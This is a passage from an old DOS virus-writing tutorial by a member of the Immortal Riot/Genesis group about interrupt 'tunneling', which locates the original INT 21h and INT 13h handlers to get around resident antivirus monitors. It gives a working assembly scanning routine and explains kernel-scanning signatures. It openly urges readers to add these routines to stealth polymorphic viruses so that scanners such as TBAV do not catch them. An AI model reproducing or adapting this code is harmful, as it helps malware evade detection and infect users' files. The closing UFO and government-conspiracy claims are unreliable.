i21 kernel entrypoint.

    .-------------------.
    | How Yosha's works |
    '-------------------'
    Yosha's also finds the DOS data segment (with a different function call)
and scans through that segment for the first JMP CS:[DWORD MEM] instruction.
Then, it calculates the address of the 2nd JMP CS:[DWORD MEM] after that one,
and uses the address pointed to by it, to check for the i21 CLI entrypoint
marker.

    .------------------.
    | Which is better? |
    '------------------'
    Well, this is pretty hard to work out actually ;)  Rajaat's is more secure,
as it doesn't depend on a fixed constant like Yosha's.  HOWEVER, in actuality,
the 3rd JMP CS:[DWORD MEM] will always (as far as I know) point to the i21
handler... which means Rajaat's method is slightly redundant :) Although this
is the case, redundant code impresses me, so Rajaat wins out ;)

    .---------.
    | Example |
    '---------'
rtfm proc near
    mov ax, 4300h
    int 2fh
    cmp al, 80h
    jne rtfm_error          ; abort if no memory manager

    mov ah, 52h
    int 21h                 ; ES == DOS data segment

    push es
    pop ds
    xor si, si
    cld

rtfm_loop:
    lodsw
    cmp si, -1
    je rtfm_error           ; abort if entire segment scanned with no result
    dec si
    cmp ax, 9090h
    jne rtfm_loop           ; reloop if no double-NOP signature

    cmp word ptr ds:[si+4], 0ff2eh
    jne rtfm_loop           ; no JMP FAR CS: there

    cmp byte ptr ds:[si+6], 2eh
    jne rtfm_loop           ; no JMP FAR CS: there

    mov bx, ds:[si+7]
    les di, ds:[bx]

    cmp byte ptr es:[di], 0fah
    jne rtfm_loop           ; no CLI at entrypoint

    mov cs:[orig_21], di
    mov cs:[orig_21+2], es
    clc
    ret                     ; save address and exit

rtfm_error:
    mov cs:[orig_21], 0
    mov cs:[orig_21+2], 0
    stc
    ret                     ; clear address and exit
rtfm endp

    .---------------.
    | How reliable? |
    '---------------'
    Well, it's not very reliable, for numerous reasons.  Sigh, neither will
work under Windows, and neither will work if a memory manager isn't loaded
(Rajaat's checks for a memory manager, Yosha's doesn't).  Also, neither will
work under QEMM if DOSDATA.SYS is being used to free up conventional memory,
because DOSDATA.SYS relocates the DOS data segment into upper memory, far far
away from the DOS code segment, meaning none of the double-NOP or JMP FAR
pointers will be found.  Both, being kernel scanners, also have the problems
associated with kernel scanners which are discussed in the next section.

    If it wasn't for those problems with kernel scanners, and -IF- DOSDATA.SYS
was not being used, the routines would be secure.  The good thing is, neither
has much chance of returning you a wrong value, so including a tunneler such as
these in your viruses wouldn't hurt, as long as you included a few backup
tunnelers in case these fail.

-----------------------------------------------------------------------------
Section 9:  Other tidbits
-----------------------------------------------------------------------------
    There were a few mini-tidbits of information left to tell you, which were
too small to fit into normal sections, and also a few notes about things I said
in previous documents which proved untrue, etc, etc... you could call them
woopsies :)  Anyway, here they are :)

    .-----------------.
    | Kernel scanning |
    '-----------------'
    Okay, now you know most of the different routines so far... but many of
them have something in common... scanning for the DOS kernel entrypoint through
a certain segment.  This is the fundamental basis of most of the techniques
you've seen so far.  Most of them are simply trying to track down the DOS code
segment so they can begin scanning.

    You might be asking yourself how you're supposed to scan :)  It's just a
term used to describe checking through the whole segment for a set of hex bytes
which indicate the entrypoint of the i21 handler.  For instance, usually, they
are CLI/CMP AH, 6C/JA XX... or, alternatively, NOP/NOP/CALL XX/JMP FAR [XX].
The problem with the second signature is that the area surrounding it is FULL
of ones exactly like it... however you can tell which one is the real one,
because it is the 3rd set of double-NOPs.

    .-------------------------------.
    | Problems with kernel scanning |
    '-------------------------------'
    Kernel scanning relies on a certain signature to find the DOS entrypoint.
Obviously, DOS versions change, and since normal programs SHOULDN'T be relying
on certain DOS code to stay constant... Microsoft couldn't really be blamed for
totally rewriting their interrupt handlers and making all old signatures
absolutely useless.  Hell, they could totally rewrite DOS into a protected mode
version for all I know.  Anyway, there are quite a few different DOS types out
there, DR-DOS, Novell DOS, etc, and you could never be sure all will use the
same signature as Microsoft DOS.  However, those are only possibilities, the
truth of it is, that there is probably never going to be a new DOS version, and
that the other types of DOS do use practically the same signatures as the
Microsoft version.

    However, there are more problems.  Some viruses, anti-viruses, and network
software, hook into i21 by overwriting the initial entrypoint with a FAR JMP,
FAR CALL, or INT to their own code... and once they are finished, they put the
proper code back in the i21 handler, and once the i21 handler has finished,
replace the original entrypoint code with their own again.  Novell Netware for
DOS does this... and I would think that A LOT of people run Novell.  Not many
AV programs use this method... however quite a few viruses do these days, to
prevent detection by resident AV programs which warn the user when a program
hooks an interrupt such as i21.

    By picking the right signatures though, ones which aren't right at the
entrypoint and therefore vulnerable to being overwritten, but close by and not
likely to change between the versions of DOS... you could still get away with
kernel scanning.

    .--------------------------.
    | i40 and BIOS entrypoints |
    '--------------------------'
    i40 is actually the original BIOS i13 floppy disk handler... which is
redirected to the i40 address -IF- and -ONLY IF- a hard disk is present on the
system.  You can use i40 just like i13, except it won't accept hard disk
numbers as parameters.  Make sure you check the i40 address before you use it
though, because if there is no hard disk on the system it will point into
nothingness.  Oh, and in some BIOSes, the original i13 handler is at F000:EC59,
however I wouldn't depend on this too much, considering the number of different
BIOSes out there.  Mine points there though...

    Another unreliable way of finding the original i13 address in the BIOS is
to scan through it for the starter bytes of an i13 handler.  BIOSes differ,
however, generally speaking, they start with a CMP DL, 80... or a TEST DL, 80
followed shortly after by an INT 40.  It would not be hard to make a scanner
for this... however I cannot vouch for its reliability or how successful it
would be.

    It would be a lot safer to simply use a good code tracer/emulator to go
through the i13 code until it hits segment F000h or C800h, where the AT+ and XT
i13 entrypoints respectively reside.

    .-------------------------------.
    | QEMM plays "Romeo and Juliet" |
    '-------------------------------'
    Catchy heading huh?  Well, basically, when you have QEMM and DOSDATA.SYS on
a system, sometimes they actually work together properly and free up basically
all of your lower memory... even memory lower than segment 300h.  If that
number sounds familiar, then good... if it DOESN'T sound familiar, you've
obviously totally forgotten about tunneling document #1, where I told you how
to locate the original i21 handler.

    Basically, the easiest way in single stepping to locate i21 was to locate
the first DOS MCB and if, in your int 1 routine, your CS hits a value equal to
or below this value, then you are in the DOS kernel.  I had also said that
generally the DOS CS is below 300h, so you could use that as a check (if CS <
300h, then CS==DOS CS).  Now, I have learnt that I was wrong, so you have to go
back to using the find-first MCB method.

    Oh, and you're probably wondering what the f**k all this has to do with
Romeo and Juliet.  It's obvious isn't it?  "Wherefore art thou i21?"  <Reader
goes silent, staring at wall, eyes glaze over>  Yeah yeah, hopeless.

-----------------------------------------------------------------------------
Section 10:  Conclusion
-----------------------------------------------------------------------------
    Once again there proves to be life beyond single stepping and code tracing,
and now you have a MULTITUDE of virtually unstoppable routines with which to
tunnel.  Most of them are small and reliable... and there's no reason not to
include at least one or two in your next virus... unless you want to look
demented when your full stealth polymorphic tsr com/exe/sys infector is caught
by TBAV when infecting files...

    .------------------------------------------------------------------.
    | PLUG PLUG PLUG PLUG PLUG PLUG PLUG PLUG PLUG PLUG PLUG PLUG PLUG |
    '------------------------------------------------------------------'
    Yes that's right!  Time for a plug!  Tunneling document #4 will be out soon
(I'm already working on it!), and do you know what it's about?  FULL CODE
EMULATION.  That's right!  I've been writing these code emulation babies (yes,
TWO of them) for the aliens, and let me tell you, they rock the ass off of
anything you've -EVER- -EVER- seen.  And they are ready to be presented in
document #4!!!  The last and final and definitive document on tunneling you
will -EVER- need in your entire coding life.

    Not only can they be used to tunnel interrupts, they can be used to run
software under your own control (provided that software doesn't use protected
mode, of course, sheeit, I aint gunna emulate that).  This means they can ALSO
be used in your own AV software to decrypt even the most COMPLEX forms of
polymorphism which aren't even out yet!!!!!!!!!  If that's not enough, they can
be used to infect files not at the beginning, not at the end, but RIGHT IN THE
GODDAM MIDDLE!  YEHAH!  (you'll see a document about mid-file infection out by
me some time in the future).  They slice!  They dice!  They emulate!  Goddamit,
they do EVERYTHING!!!

     So, what are you waiting for?  Start asking for document #4 today!

    .----------------.
    | PLUG MODE: OFF |
    '----------------'

    Sigh, back to normal.

    On the topic of normal, you'll find a nice juicy example program along with
this document, just like you did with the other two, containing examples of all
the methods presented so far in here and giving you results of where each
method thinks i21/i13 are.  You'll most likely get a lot of wrong guesses, but
them's the breaks.  A lot of these routines aren't exactly what I'd call 100%
reliable.  Well, not even 80% reliable :)

    Oh, and now you want to have your status level increased do you?  Well, I
suppose that since you learnt a lot about the insides of DOS in this session,
you might be ready to be given the title of extraterrestrially intelligent
tunneler.  There you go, don't you feel so much better?

    Speaking about aliens... did you know the US government is secretly using
crashed UFO technology to create their own 'primitive' and yet highly advanced
UFO fleet, to protect US citizens if the 'grays' (aliens) go back on their
peace treaty and try to invade Earth (the treaty went along the lines of "you
give us some of your weaponry, and we'll cover up your existence and let you
take people late at night from their homes to run tests and shit")?  At least,
that's what some people (like me) think.

    Not only that, I'm sure you'll be glad to know the US military is building
weapons which utilize INTENSE electromagnetic fields, which can blow a UFO out
of space from the ground.  Yes, you heard me right, they could blow their own
astronauts up if they wanted to... a scary thought should a space shuttle be
'misidentified'.  Of course, I don't think the systems are automated yet so we
are only prone to human error (may God have mercy on our souls, hehe).

    Anyway, you are now a gray.  How does it feel?  Aren't you just loving that
intense alien energy flowing through your now highly intelligent body?  Feel
like going out late at night, stealing people from their beds and carrying out
biological tests on them, returning them a few hours later to have nose bleeds
from the metal tracking devices you've inserted into their noses?  If so, then
check yourself into the nearest looney bin, heh, you're only as smart as a
tunneling alien... NOT AN ACTUAL ALIEN.  Or.......... are you?!???!! :)

    I really hope you enjoyed this document... it was actually quite hard to
write compared to the others... simply because it's hard to tie 8 totally
unrelated methods into one document... and the new CMT 2.0 standard took a bit
of thinking to get working.  It's strange to see how little people out there
really know about mini tunneling routines... the ones here were damn hard to
come by.  So, until you become a tunneling god in document #4 (you really
should get it, it is going to be the -BEST-)... sigh, don't get abducted by
aliens now, you hear?

                                        Methyl [Immortal Riot/Genesis]